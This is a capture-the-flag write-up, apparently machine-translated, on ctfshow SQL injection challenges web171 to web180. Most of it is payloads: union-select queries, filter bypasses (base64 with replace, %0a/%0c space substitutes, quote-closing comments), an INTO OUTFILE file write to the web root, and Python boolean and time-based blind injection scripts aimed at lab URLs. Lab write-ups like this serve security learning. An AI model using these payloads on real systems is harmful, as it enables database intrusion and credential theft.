Catalog

web171

summary ：

web172

web173 

web174

Method 1 ： String conversion bypass

Method 2 ： Blind note

web175

Method 1 ： Time blind note

Method 2 ： File is written to

summary ：

web176

web177

summary ：

web178

summary ：

web179 

web180

  summary ：

web171

use order by Judgment fields , Confirm that the number of fields is 3

Then, all the table names of the current database are exposed with the union injection

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

According to the title SQL Sentence judgment ,flag Just in the field password in , And the corresponding field next to username The value is flag, So structure payload Direct view flag

-1' union select 1,2,password from ctfshow_user where username = 'flag' --+

summary ：

Sometimes annotators # Can not use , Can be replaced by --+ Comment out , The result of the union query follows the previous where Is independent of the limitations of , Like the front username != ‘flag’ Invalid for union injection

web172

The following question is similar , Only the number of fields here is 2, There is also a constraint

Determine whether the echoed field has flag, Yes flag Can't echo

First look at the watch

-1' union select 2,group_concat(table_name) from information_schema.tables where table_schema = database()--+

It's obvious here flag Not in the first table , structure payload 

-1' union select 2,password from ctfshow_user2 where username = 'flag' --+

web173 

The number of fields is still 3, Different from the first question , There is a filter function

Determine whether there is an echo flag, If yes, the query fails , But it seems useless

-1' union select 1,2,password from ctfshow_user3 where username = 'flag' --+

web174

It can be judged that the number of fields is 2

According to the prompt , It's filtered here flag With numbers 0-9, So in query id=2 root id=3 There will be no echo when , So there are two ways to solve this problem , One is blind injection , One is to bypass

Method 1 ： String conversion bypass

because flag It must contain numbers , May also contain flag Etc , So we can do the following for the echoed value base64 encryption , Then replace with numbers , You can bypass the query result detection , The functions used are to_base64 and replace

This structure payload

-1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(to_base64(password),"1","@A"),"2","@B"),"3","@C"),"4","@D"),"5","@E"),"6","@F"),"7","@G"),"8","@H"),"9","@I"),"0","@J") from ctfshow_user4 where username = 'flag' --+

Copy the password , Paste it into the decryption script to get flag

import base64

flag64 = " "

flag = flag64.replace("@A", "1").replace("@B", "2").replace("@C", "3").replace("@D", "4").replace("@E", "5").replace("@F", "6").replace("@G", "7").replace("@H", "8").replace("@I", "9").replace("@J", "0")

print(base64.b64decode(flag))

Method 2 ： Blind note

We first need to know the interface of query and the difference between the correct page and the wrong page python Script run , First use burpsuite Grab the bag id Query interface

Splice to get the query interface url

ca140cdb-03af-4111-aea3-508eb34a10a1.challenge.ctf.show/api/v4.php?id=1&page=1&limit=10

  Visit the website directly

Blind note with Boolean logic , Try the error page

ca140cdb-03af-4111-aea3-508eb34a10a1.challenge.ctf.show/api/v4.php?id=1' and 0--+

 admin It is the key to judge whether it is correct , Take advantage of this , Write python Script （ Limited ability , The code is a bit rotten and runs a little longer ）

import requests

url = "http://1641eab8-d9ad-45ac-b1f6-088311ddb9e0.challenge.ctf.show/api/v4.php"
flag = ""

for i in range(1,100):
    c = 32
    while c > 31:
        payload_1 = "?id=1' and ascii(substr((select group_concat(password) from ctfshow_user4 where username = 'flag'),%d,1)) > %d -- -"%(i,c)
        payload_2 = "?id=1' and ascii(substr((select group_concat(password) from ctfshow_user4 where username = 'flag'),%d,1)) = %d -- -"%(i,c)
        res_1 = requests.get(url=url+payload_1).text
        res_2 = requests.get(url=url+payload_2).text
        if "admin" in res_1:
            c = c + 10
        elif "admin" in res_2:
            flag += chr(c)
            print(flag)
            print(c)
            break
        else:
            c = c - 1

web175

Regular matching \xnn It stands for ascii The code is hexadecimal nn String , This pass filters out ascii from 0 To 127 The characters of , So you can't just rely on the back to reveal flag 了 , But you can use time blindness and writing documents to get flag

Method 1 ： Time blind note

Get the interface url, Write a time blind note python Script

#ctfshow web175
import requests


url = "http://84e961fe-66cb-4aeb-b84e-bc8d9fc931bd.challenge.ctf.show/api/v5.php"
flag = ""
i = 0

while True:
    i = i + 1
    left = 32
    right = 127
    while left < right:
        mid = (left + right) // 2
        payload = f"?id=1' and if(ascii(substr((select group_concat(password) from ctfshow_user5 where username='flag'),{i},1))>{mid},sleep(2),0) -- -"
        try:
            res = requests.get(url = url + payload, timeout = 0.6)
            right = mid
        except Exception as e:
            left = mid + 1
    if left != 32:
        flag += chr(left)
        print(flag)
    else:
        break
    

Method 2 ： File is written to

The premise of writing files is to know the initial directory of the website , Generally speaking, it is /var/www/html/

structure payload

 0' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

And then visit 1.txt You can get flag

summary ：

When the output is limited, the file write operation can be used ,into outfile

web176

use order by Determine the number of fields as 3, Then use the joint query

  Found that the union query has been filtered out ,select It's filtered out , Use case to go around

Let's first look at the table name of the current database

0' union Select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database() --+

Then just like the above , Direct explosion flag

0' union Select 1,2,group_concat(password) from ctfshow_user where username = 'flag' --+

web177

After testing , Same as above , Is to filter out the blank space , It is equivalent to putting the comment character -- It's filtered out , We can use /**/ Or is it %0a（ enter ） To bypass space filtering ,%23（#） To bypass the annotation filter , And then we just take it flag

'/**/Union/**/Select/**/1,2,group_concat(password)/**/from/**/ctfshow_user/**/where/**/username='flag'%23

summary ：

This kind of topic cannot be used in general fuzz run , because SQL sentence in wrong , It is the same echo as the filtered keywords , Only one test at a time , Or directly use tools to generate the corresponding correct fuzz run

web178

Compared with the previous question, it filters out /**/ annotator , But you can use carriage return （%0a）、 Brackets 、%09、%0c、%0d、%0b Instead of , equally

'%0aUnion%0aSelect%0a1,2,group_concat(password)%0afrom%0actfshow_user%0awhere%0ausername='flag'%23

summary ：

Spaces are filtered and can be used ,/**/,%09,%0a,%0b,%0c,%0d And parentheses around

web179 

It is also found that many symbols are filtered , however %0c It works , Keep up with the question

'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

web180

%23 It's filtered out , You can use the closing sign to comment out the following statements '1'='

'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'or'1'='

  summary ：

There are three ways to annotate ,-- and # There are also closing notes